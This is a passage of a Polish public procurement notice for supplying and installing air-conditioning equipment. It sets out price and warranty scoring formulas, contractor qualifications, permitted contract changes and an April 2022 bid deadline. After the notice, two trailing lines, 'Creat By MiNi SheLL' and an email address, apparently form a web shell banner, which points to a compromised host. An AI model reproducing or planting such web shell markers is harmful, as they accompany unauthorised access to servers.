class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt 8 ustawy<br/>Prawo zamówień publicznych, polegających na dostawie urządzeń klimatyzacyjnych . Przedmiot<br/>zamówienia: zwiększenie bieżących dostaw lub rozbudowa istniejących instalacji zgodne z<br/>przedmiotem zamówienia podstawowego o kodach CPV określonych w tym zamówieniu. Wielkość<br/>lub zakres zamówienia: do 20% wartości zamówienia podstawowego. Warunki na jakich zostanie<br/>udzielone zamówienie: zgodnie z warunkami dotyczącymi zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej zamawiający będzie kierował się następującymi<br/>kryteriami, z przypisaniem im odpowiednio wag:<br/>1) cena oferty – 60%<br/>2) okres gwarancji – 40%<br/>2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) Punkty w kryterium cena brutto oferty w PLN wyliczone będą z dokładnością do<br/>dwóch miejsc po przecinku (zasada zaokrąglania trzeciego miejsca po przecinku –<br/>poniżej 5 końcówkę pomija się, powyżej i równe 5 zaokrągla się w górę) wg<br/>poniższego wzoru:<br/>Cmin<br/>C= ------------------ x 60 pkt.<br/>Cx<br/>gdzie:<br/>C – przyznane punkty w kryterium ceny oferty brutto w PLN;<br/>Cmin - najniższa cena oferty brutto w PLN spośród ofert niepodlegających odrzuceniu;<br/>Cx – cena brutto w PLN badanej oferty.<br/>2) Punkty w kryterium okres gwarancji, zostaną przyznane wg następujących zasad:<br/>Okres gwarancji – maksymalnie 40 pkt. (nie mniej niż 36 miesięcy, nie więcej niż 84<br/>miesiące)<br/>Przyjmuje się, że oferta z najdłuższym okresie gwarancji otrzyma 40 pkt.<br/>W przypadku gdy Wykonawca poda dłuższy okres gwarancji do obliczeń Zamawiający przyjmie wartość<br/>84 miesiące. W przypadku, gdy Wykonawca złoży ofertę, w której wskaże okres gwarancji poniżej 36<br/>miesięcy oferta będzie potraktowana jako niezgodna z treścią SWZ i zostanie odrzucona, w przypadku<br/>gdy Wykonawca nie wpisze nic w tym kryterium oceny, Zamawiający przyjmie do obliczeń wartość<br/>minimalną gwarancji, tj. 36 miesięcy.<br/>X =<br/>ilość pełnych miesięcy okresu<br/>gwarancji ocenianej oferty - 36 x 40 pkt.<br/>84 - 36<br/>3. Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą liczbę punktów łącznie<br/>ze wszystkich kryteriów. Ocenę łączną oferty stanowi suma punktów uzyskanych w ramach<br/>poszczególnych kryteriów. Zamawiający wyliczy ocenę łączą ocenianych ofert na podstawie<br/>poniższego wzoru:<br/>E = C + X<br/>gdzie:<br/>E – łączna liczba punktów otrzymana przez ofertę we wszystkich kryteriach oceny,<br/>C – liczba punktów w kryterium ceny oferty brutto w PLN,<br/>X – liczba punktów w kryterium okres gwarancji.<br/>4. Zamawiający będzie zaokrąglał punkty do dwóch miejsc po przecinku w każdym wskaźniku.<br/>Zasada zaokrąglenia dotyczy trzeciego miejsca po przecinku – poniżej 5 końcówkę pominie,<br/>powyżej i równe 5 zaokrągli w górę.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert<br/>wybierze ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający<br/>wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym ofert<br/>dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu określone przez Zamawiającego w ogłoszeniu<br/>o zamówieniu i niniejszej SWZ.<br/>2. Zamawiający wymaga wykazania przez Wykonawcę spełnienia warunków określonych<br/>w art. 112 ust. 2 ustawy pzp dotyczących zdolności technicznej i zawodowej:<br/>1) Zamawiający uzna warunek za spełniony jeżeli wykonawca przedstawi wykaz zamówień<br/>zrealizowanych nie wcześniej niż w okresie ostatnich 3 lat od dnia w którym upływa termin<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie minimum<br/>dwóch zamówień o wartości min. 100.000,00 zł brutto (słownie: sto tysięcy złotych) każda,<br/>polegających na dostawie, montażu i uruchomieniu systemu klimatyzacji;<br/>3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach polegać na zdolnościach technicznych lub zawodowych lub sytuacji<br/>finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru<br/>prawnego łączących go z nimi stosunków prawnych.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,<br/>jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane.<br/>5. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą, zobowiązanie podmiotu (wzór - załącznik nr 4 SWZ) udostępniającego<br/>zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca, realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie podmiotu<br/>udostępniającego zasoby ma potwierdzać, że stosunek łączący Wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w<br/>szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty należy dołączyć oświadczenie o niepodleganiu wykluczeniu w postaci elektronicznej<br/>opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, a<br/>następnie wraz z plikami stanowiącymi ofertę skompresować do jednego pliku archiwum (ZIP)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia<br/>następujących podmiotowych środków dowodowych potwierdzających spełnianie warunków<br/>udziału w postępowaniu:<br/>1) wykaz zamówień zrealizowanych nie wcześniej niż w okresie ostatnich 3 lat od dnia w którym<br/>upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie<br/>minimum dwóch zamówień o wartości min. 100.000,00 zł brutto (słownie: sto tysięcy złotych)<br/>każda, polegających na dostawie, montażu i uruchomieniu systemu klimatyzacji - z załączeniem<br/>dowodów określających czy zostały one wykonane należycie, w szczególności informacji o tym<br/>czy dostawa i montaż został wykonany zgodnie z przepisami prawa budowlanego i prawidłowo<br/>ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>wystawione przez podmiot, na rzecz którego dostawa i montaż były wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych<br/>dokumentów - inne dokumenty (wzór wykazu - załącznik nr 5 do SWZ);<br/>2. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia należy przekazać<br/>Zamawiającemu przy użyciu środków komunikacji elektronicznej dopuszczonych w SWZ, w<br/>zakresie i sposób określony w przepisach rozporządzenia Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>Podmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone wraz z<br/>tłumaczeniem na język polski.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty należy dołączyć oświadczenie o niepodleganiu wykluczeniu w postaci elektronicznej<br/>opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym, a następnie wraz z plikami stanowiącymi ofertę skompresować do jednego pliku<br/>archiwum (ZIP).<br/>2. Do przygotowania oferty zaleca się wykorzystanie Formularza Oferty, którego wzór stanowi<br/>Załącznik nr 1 do SWZ. W przypadku, gdy Wykonawca nie korzysta z przygotowanego przez<br/>Zamawiającego wzoru, w treści oferty należy zamieścić wszystkie informacje wymagane w<br/>Formularzu Ofertowym.<br/>3. Do oferty należy dołączyć pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę<br/>składa pełnomocnik. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia do oferty<br/>należy załączyć pełnomocnictwo dla pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego.<br/>2. Wykonawca dołącza do oferty oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy, którego<br/>wzór stanowią załączniki nr 2 i 3 do SWZ. Oświadczenie stanowi dowód potwierdzający brak<br/>podstaw wykluczenia, spełnianie warunków udziału w postępowaniu na dzień składania ofert,<br/>tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe. W<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym<br/>mowa powyżej - załączniki nr 2 i 3 do SWZ, składa każdy z Wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany umowy w przypadku: 1) ustawowej zmiany stawki podatku od towarów i usług VAT, 1) Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Umowy.<br/> 2) Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów przez Strony,<br/> 3) Wystąpienia konieczności zmiany osób wskazanych w reprezentacji (śmierć, choroba, ustanie stosunku pracy lub inne zdarzenia losowe lub inne przyczyny niezależne od Wykonawcy) przy pomocy, których Wykonawca realizuje przedmiot Umowy. Zmiana jest możliwa pod warunkiem zaproponowania innych osób spełniających warunki określone w SWZ. <br/> 4) Wystąpienia konieczności zmiany osób (śmierć, choroba, ustania stosunku pracy lub inne zdarzenia losowe lub inne przyczyny niezależne od Zamawiającego), przy pomocy których Zamawiający realizuje przedmiot Umowy.<br/> 5) Wystąpienia konieczności zmian osób Wykonawcy, w przypadku gdy Zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób, na inne spełniające warunki, w terminie nie dłuższym niż 14 dni od daty złożenia wniosku Zamawiającego. <br/> 6) Zmiany terminów realizacji przedmiotu Umowy z przyczyn niezależnych od Wykonawcy, w szczególności: <br/> a) jeżeli będą następstwem: <br/> • zmiany przepisów prawnych istotnych dla realizacji przedmiotu Umowy,<br/> • polecenia przez Zamawiającego dokonania zmian w uzgodnionych wcześniej rozwiązaniach, <br/> 7) Wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami:<br/> a) siła wyższa uniemożliwiająca wykonanie przedmiotu Umowy zgodnie ze szczegółowym <br/> opisem (siła wyższa to zdarzenie: (a) zewnętrzne, (b) niemożliwe (lub prawie niemożliwe) do przewidzenia, (c) którego skutkom nie można zapobiec),<br/> b) zmiana danych związanych ze zmianami administracyjno-organizacyjno-prawnymi Umowy,<br/> 8) W przypadku wystąpienia któregokolwiek ze zdarzeń wymienionych w pkt 1 do 7 powyżej termin realizacji przedmiotu Umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.<br/> 9) Wystąpienia konieczności wprowadzenia zmiany wysokości wynagrodzenie (zwiększenia lub zmniejszenia) w przypadkach określonych w § 3 ust. 7.<br/> 10) Pozostałe zmiany określone w Umowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/leba</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-08 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com